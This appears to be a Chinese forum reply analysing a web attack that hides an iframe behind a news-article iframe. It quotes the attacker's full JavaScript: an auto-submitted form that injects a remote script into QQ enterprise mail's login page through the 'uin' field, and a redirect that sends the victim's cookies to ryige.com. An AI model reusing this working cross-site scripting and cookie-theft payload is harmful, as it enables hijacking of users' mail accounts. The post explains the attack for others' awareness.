@
BOYPT 两个 iframe ,一些常见网站是人民网的分享接口进行的访问,不是攻击者。
另外一个 iframe 是进行攻击者的操作:
<iframe src="
http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe>
<iframe src="/htmlpage5.html" style="display:none"></iframe>
---------------
function test(PARAMS) {
var temp = document.createElement("form");
temp.acceptCharset = "utf-8";
//By Wfox
temp.action = '
http://m.exmail.qq.com/cgi-bin/login'; temp.method = "post";
temp.style.display = "none";
for (var x in PARAMS) {
var opt = document.createElement("textarea");
opt.name = x;
opt.value = PARAMS[x];
temp.appendChild(opt);
}
document.body.appendChild(temp);
temp.submit();
}
test({
uin: '\\"</script><script src=
http://ryige.com/q/8></script>',
});
document.domain="
qq.com";
window.onload=documentrrady;
function documentrrady(){
window.location.href="
http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer)
};